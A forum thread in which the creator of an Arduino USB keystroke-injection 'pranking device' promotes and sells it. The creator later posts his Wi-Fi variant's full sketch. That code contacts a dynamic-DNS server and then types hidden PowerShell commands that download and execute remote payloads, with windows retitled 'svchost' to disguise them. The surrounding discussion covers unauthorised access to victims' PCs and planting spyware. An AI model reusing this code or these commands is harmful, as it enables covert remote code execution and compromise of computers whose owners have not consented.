[Tutorial] supremeDuck (pranking device)

[monday]

What is it?
It's an arduino based device which can be connected to a PC and pretend to be "Human Interface Device" like keyboard and mouse. This project utilizes a smartphone with an android to trigger specific actions. The android application was made using "MIT app inventor 2" and is open source as well as the arduino sketch so the user can adjust its functionality.

What can you do with it?
Plug it in to your friend's PC and by pressing a button on your android smartphone:
-access a website
-play a youtube video
-type pre-defined text of your choice
-download and execute file
-move mouse cursor
-and much more...



[video=youtube]https://www.youtube.com/watch?v=FsTeedpYeg4[/video]


Functionality - Youtube video
Dynamic language encoding - Youtube video


More info
https://github.com/michalmonday/supremeDuck

Tutorial
https://github.com/michalmonday/supremeDuck/wiki/DIY-Tutorial

[img=500x312]https://i.imgur.com/3obiXgm.png[/img]

How to get it?
1. Follow the tutorial and make it yourself.          
2. Get it from me at: http://monday.pythonanywhere.com/

 

[samphacks]

do you live in UK?

 

[monday]

_ yeah

 

[MrChristmas]

Good luck! ^_^

 

[Cinaro]

Interesting, I'm gonna make this wen i have time so i can mount this shit in a police station free PC use we have here and play a good old song.

 

[Narcotic]

Genius.

 

[Parazitas]

Very good tutorial.

 

[0BE4]

What if it's just simply a flashdrive that would replace some .dll required for windows by something that would connect the computer to a server runed by your computer... instead of you making functions why won't it be like: you write the C++ or C# code then it gets compiled there?

Advantages:
ANYONE can make it...
much cheaper...
much simpler...
would work even if you are in a different country...
can give you a view of their webcam and desktop...
999999999x as powerful....
Can display stuff on their computer directly without another program...
and for people who don't know how to code... they can simply download codes...

Disadvantages:
simple enough... both of you would need an internet connection... but who cares?? everyone now has an internet connection...

@monday

 

[0x32789]

What if it's just simply a flashdrive that would replace some .dll required for windows by something that would connect the computer to a  server runed by your computer... instead of you making functions why won't it be like: you write the C++ or C# code then it gets compiled there?

Advantages:
ANYONE can make it...
much cheaper...
much simpler...
would work even if you are in a different country...
can give you a view of their webcam and desktop...
999999999x as powerful....
Can display stuff on their computer directly without another program...
and for people who don't know how to code... they can simply download codes...

Disadvantages:
simple enough... both of you would need an internet connection... but who cares?? everyone now has an internet connection...

@monday

not everyone has internet connection like I dont.

 

[monday]

@opcode
I actually made one with wifi hidden inside mp3 player case and one with GSM activation so you could actually call to it;p

That's the wifi one

Spoiler

[img=600x400]http://i.imgur.com/FxgN5mv.jpg[/img]

[img=450x500]http://i.imgur.com/3Ga0VM5.jpg[/img]

But both were not the best solutions for it.

Anyway... there's no "autorun" for flashdrive so you'd have to manually execute/move these files.
(or you actually can? https://www.youtube.com/watch?v=lFlgddjOPpw)
You could use the original HAK5's rubber ducky though which acts like a USB hub, part of it stores the file, another part acts as a HID which finds the location of the storage through the windows command prompt and executes the file, I have no idea how to do it with arduino and it's not a trivial task.

Wifi requires you to provide password for the network, bluetooth works anywhere.

I'm not sure what you mean with "you write the C++ or C# code then it gets compiled there", it gets compiled where and how? This thing requires physical access to the PC, you could make some kind of spyware and place it on the victims PC manually or use the original rubber ducky, the supremeDuck isn't the best tool for that because it gets recognized by PC as "Arduino" too which makes HID abilities not 100% reliable on every system as mentioned in the main post. But still you could try it using supremeDuck, as long as you know the language encoding (and it's Win 8 or Win 10) there's a commented out piece of code within arduino sketch which activates a "secret" function.

/*
#define EEPROM_ADDRESS_TRIGGER_TRICK 0
trick = plug it in + plug out within 3 secs = special function is triggered(that special function is commented out in "setup" funciton)
*/




/*//within void Setup()
  //TRIGGER TRICK
  //plug in and out within 3 sec to trigger some action at the next plug in
  byte triggerDefault = 0;
  EEPROM.get(EEPROM_ADDRESS_TRIGGER_TRICK, triggerDefault);
  byte c =1;
  EEPROM.put(EEPROM_ADDRESS_TRIGGER_TRICK, c);
  if(triggerDefault == 1)
  {
    //action
  }

  delay(3000);
  c =0;
  EEPROM.put(EEPROM_ADDRESS_TRIGGER_TRICK, c);  
  */ 

So you plug it in somewhere, plug out within 3 seconds, plug in again and it triggers some special function (e.g. download and execute file using powershell)


Btw there are few USB network based projects aimed at unauthorised access like Samy Kamkar's device based on Raspberry Pi Zero
https://www.youtube.com/watch?v=Aatp5gCskvk

or the new product from HAK5 called Bash Bunny which seems to be the best in its class (but it's like $100)+`
https://www.youtube.com/watch?v=CvI_mrQYaF8

supremeDuck has some potential to provide unauthorised access but it's not 100% reliable which is required by such tools. It does the pranking job relatively well so that's why the app + whole project isn't aimed at exploiting but pranking instead.

 

[0BE4]

Well i mean if you can write codes then send it to a user as a text message... then it's saved into a file... then that code get compiled in victim's computer... well i thought autorun.inf did the thing of autorunning... nice project anyway... also can i have the wifi edition's code? @monday

 

[monday]

I doubt you'll find it valuable... the code is a mess, also esp8266 modules have different firmwares, sellers usually sell the modules with outdated firmware so you'd have to reflash it yourself, otherwise it won't work. It took me 3 days of regular battle to make it work, I think it's just not worth it

#include <SoftwareSerial.h>
#include "Keyboard.h"
#include <EEPROM.h>
//#define _SS_MAX_RX_BUFF 256 // RX buffer size //BEFORE WAS 64



SoftwareSerial esp8266Module(8, 9); // RX, TX

String network[2] = {"TestingName", "SKYE1467"};
String password[2] = {"TestingPass", "DTRAWDSS"};
int myNetworksCount = 2;
unsigned long startTimeTimedLoop;
int wifiStatus = 1;
#define WEBDELIVERY_CODE "37s8nf82n0l"


void setup() {

  Serial.begin(9600);
  esp8266Module.begin(9600);//(115200);

  //plug in and out within 3 sec to trigger webdelivery at the next plug in
  char triggerDefault = 0;
  EEPROM.get(0, triggerDefault);
  char c = 1;
  EEPROM.put(0, c);
  if (triggerDefault == 1)
  {
    PowershellDownloadFile();
    //Web_Delivery();
  }

  delay(3000);
  c = 0;
  EEPROM.put(0, c);


  delay(5000);
}

void loop()
{
  switch (wifiStatus)
  {
    case 0:    // 0 need to reset or beginning of loop
      Serial.println("TRYING esp8266Reset");
      esp8266Reset();
      break;
    case 1:    // 1 reset complete check wifi mode
      delay(200);
      Serial.println("TRYING changeWifiMode");
      changeWifiMode();
      break;
    case 2:    // 2 wifi mode is 3, now check network connection
      delay(200);
      Serial.println("TRYING checkWifiStatus");
      checkWifiStatus();
      break;
    case 3:    // 3 If not connected connect to network
      delay(200);
      Serial.println("TRYING connectToWifi");
      connectToWifi();
      //connectToWifi("networkIdetifier", "networkPassword");
      break;
    case 4:    // 4 request page from server
      delay(200);
      Serial.println("TRYING getPage");

      getPage("givdata.zapto.org", "/test", true, "5123"); // (website, page, isItMyServer, port)
      // getPage("sa-mp.im", "/api/v1/players/get", false, "80");

      break;
    case 5:    // 5 unlink from server after request
      delay(200);
      Serial.println("TRYING unlinkPage");
      unlinkPage();
      break;
  }
}

bool esp8266Reset() {
  esp8266Module.println(F("AT+RST"));
  //esp8266Module.println("AT+RST\r\n");

  startTimeTimedLoop = millis();
  while (TimedLoop(7000))
  {
    if (esp8266Module.find("ready") || esp8266Module.find("WIFI CONNECTED") || esp8266Module.find("WIFI GOT IP"))
    {
      wifiStatus = 1;
      Serial.println("Resetted");
      return true;
    }
  }
  wifiStatus = 0;
  return false;
}

bool changeWifiMode()
{
  esp8266Module.println(F("AT+CWMODE?"));
  startTimeTimedLoop = millis();
  while (TimedLoop(1000))
  {
    if (esp8266Module.find("1"))
    {
      wifiStatus = 2;
      return true;
    }
  }

  esp8266Module.println(F("AT+CWMODE=1"));
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    if (esp8266Module.find("no change") || esp8266Module.find("OK"))
    {
      wifiStatus = 2;
      return true;
    }
  }
  wifiStatus = 0;
  return false;
}

bool checkWifiStatus() {
  esp8266Module.println("AT+CWJAP?");
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    if (esp8266Module.find(":")) //"No AP" is displayed if it's not connected
    {
      Serial.println("WIFI NETWORK CONNECTED");
      wifiStatus = 4;
      return true;
    }
  }
  wifiStatus = 3;
  return false;
}

bool connectToWifi()
{
  esp8266Module.println("AT+CWLAP");
  bool foundAppropriateNetwork = false;
  int appropriateNetworkIndex = 0;
  startTimeTimedLoop = millis();
  String netLineBuff = "";
  while (TimedLoop(12000) && foundAppropriateNetwork == false)
  {
    while (esp8266Module.available() > 0)
    {
      char c = esp8266Module.read();
      netLineBuff += c;
      if (c == ')')
      {
        Serial.println(netLineBuff);
        for (int i = 0; i < myNetworksCount; i++)
        {
          if (netLineBuff.indexOf(network[i]) >= 0)
          {
            foundAppropriateNetwork = true;
            appropriateNetworkIndex = i;
            netLineBuff = "";
            break;
          }
        }
        netLineBuff = "";
      }
    }
  }

  if (foundAppropriateNetwork == true)
  {
    String cmd = F("AT+CWJAP=\"");
    cmd += network[appropriateNetworkIndex];
    cmd += F("\",\"");
    cmd += password[appropriateNetworkIndex];
    cmd += F("\"");
    Serial.println("Trying to connect with: ");
    Serial.print("Name - ");
    Serial.println(network[foundAppropriateNetwork]);
    Serial.print("Password - ");
    Serial.println(password[foundAppropriateNetwork]);

    esp8266Module.println(cmd);
    startTimeTimedLoop = millis();
    while (TimedLoop(5000))
    {
      if (esp8266Module.find("OK"))
      {
        Serial.println("CONNECTED TO WIFI");
        wifiStatus = 4;
        return true;
      }
    }
  }

  wifiStatus = 0;
  return false;
}

bool getPage(String website, String page, bool isItMyServer, String port) {
  String cmd = F("AT+CIPSTART=\"TCP\",\"");
  cmd += website;
  cmd += F("\",");
  cmd += port;
  Serial.println(cmd);
  esp8266Module.println(cmd);

  bool linkedToServer = false;
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }

    if (esp8266Module.find("CONNECT")) //Linked"))
    {
      Serial.println("Connected to server");
      linkedToServer = true;
    }
    else if (esp8266Module.find("ALREADY CONNECTED"))
    {
      Serial.println("Connection already established");
      linkedToServer = true;
    }
  }

  if (linkedToServer == false)
  {
    Serial.println("ERROR: Failed to connect with the server: ");
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }
    //wifiStatus = 0;
    return false;
  }

  cmd =  "GET ";
  cmd += page;
  //cmd += "?something=1&lol=2";
  //cmd += " HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: www.onet.pl\r\nConnection: close\r\nUser-Agent: Python-urllib/2.7\r\n\r\n";
  cmd += " HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: ";
  cmd += website;
  if (isItMyServer == true)
  {
    cmd += ":";
    cmd += port;
  }
  cmd += "\r\nConnection: close\r\nUser-Agent: Python-urllib/2.7\r\n\r\n";

  Serial.println(cmd);
  esp8266Module.print("AT+CIPSEND=");
  esp8266Module.println(cmd.length() + 1);
  Serial.println(cmd.length() + 1);

  bool httpRequestInputReady = false;
  startTimeTimedLoop = millis();
  while (TimedLoop(3000) && httpRequestInputReady == false)
  {
    if (esp8266Module.find(">"))
    {
      Serial.println("found > prompt - issuing GET request");
      esp8266Module.println(cmd);
      httpRequestInputReady = true;
    }
  }

  if (httpRequestInputReady == false)
  {
    wifiStatus = 5;
    Serial.println("ERROR: No '>' prompt received after AT+CIPSEND");
    return false;
  }

  startTimeTimedLoop = millis();
  String dataRetrieved = "";
  char c;
  while (TimedLoop(7000))
  {
    while (esp8266Module.available() > 0)
    {
      c = esp8266Module.read();
      Serial.write(c);
      dataRetrieved += c;

      if (dataRetrieved.length() > 300)
      {
        CheckProtocol(dataRetrieved);
        dataRetrieved = "";
      }
    }

    if (dataRetrieved.indexOf("CLOSED") >= 0)
    {
      CheckProtocol(dataRetrieved);
      dataRetrieved = "";
    }
  }

  if (esp8266Module.find("test"))
  {
    Serial.println("Success");
    wifiStatus = 5;
    return true;
  }
  else
  {
    wifiStatus = 5;
    return false;
  }

}

bool unlinkPage() {
  esp8266Module.println(F("AT+CIPCLOSE"));
  //esp8266Module.println("AT+CIPCLOSE");
  startTimeTimedLoop = millis();
  while (TimedLoop(3000))
  {
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }

    if (esp8266Module.find("CLOSED"))//Unlink
    {
      Serial.println("Unlinked");
      wifiStatus = 0;
      return true;
    }
  }
  wifiStatus = 4;
  return false;
}

bool TimedLoop(unsigned long limit)
{
  if (millis() - startTimeTimedLoop > limit)
  {
    return false;
  }
  return true;
}

void openRun()
{
  Keyboard.press(KEY_LEFT_GUI);
  delay(200);
  Keyboard.press('r');
  delay(200);
  Keyboard.releaseAll();
}

void openCmd(int wait)
{
  openRun();
  delay(wait);
  Keyboard.print("cmd");
  typeKey(KEY_RETURN);
}

void EnterCommand(char text[])
{
  Keyboard.print(text);
  delay(10);
  typeKey(KEY_RETURN);
}

void EnterCommand(String text)
{
  Keyboard.print(text);
  delay(10);
  typeKey(KEY_RETURN);
}

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void CheckProtocol(String str)
{
  if (str.indexOf(WEBDELIVERY_CODE) >= 0)
  {
    Web_Delivery();
    //delay(3000);
    //openCmd(300);
    //delay(500);
    //EnterCommand("echo off & color 78 & cls");
    //delay(500);

    //Keyboard.print("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://givdata.zapto.org:5432/'); & exit");
    //typeKey(KEY_RETURN);
  }
}


void Web_Delivery()
{
  delay(3000);
  openCmd(300);
  delay(500);
  EnterCommand("echo off & title svchost & color 78  & cls");
  delay(500);

  Keyboard.print("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://givdata.zapto.org:5432/'); & exit");
  typeKey(KEY_RETURN);


  //EnterCommand(cmd);
}

void PowershellDownloadFile()
{
  delay(3000);
  openCmd(300); //("powershell Start-Process cmd -Verb runAs");
  delay(500);
  EnterCommand("echo off & mode 20,1 & title svchost & color 78 & cls"); 
  EnterCommand("powershell @$down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?6w1304v8q'; $file = 'c32.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;@ & exit");

  //stealth way (idk if works)
  //openRun();
  //delay(700);
  //EnterCommand("powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?6wv46518q'; $file = 'c32.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;");

}

 

[0x32789]

tbh the "run" box appearing looks horrible whenever you do some command, why not just change it, just execute a cmd.exe or you can also launch apps by a single line in C++, Idk what you are using to execute command but whatever that way is, its horrible :/

 

[[redsun]Akshay2]

Good luck

 

[monday]

@0x32789
it uses keyboard/mouse input only, nothing more, you could decrease delay within the code because now it's set to value which would work on slower PCs

 

[0x32789]

@0x32789
it uses keyboard/mouse input only, nothing more, you could decrease delay within the code because now it's set to value which would work on slower PCs

ah..

 

[monday]

paypal and banking cards payments are now accepted. The sale is limited to 1 device per person. It's available at: http://monday.pythonanywhere.com/

Btw the domain name is probably temporary, thanks to pythonanywhere it is hosted for free but I'll probably change "monday" to something different or I'll get a proper domain name (which isn't possible with free hosting on pythonanywhere)

 

[monday]

now the android app is also available at:
https://play.google.com/store/apps/details?id=appinventor.ai_michalmonday17.supremeDuck

 

[Scriptery]

Nice project...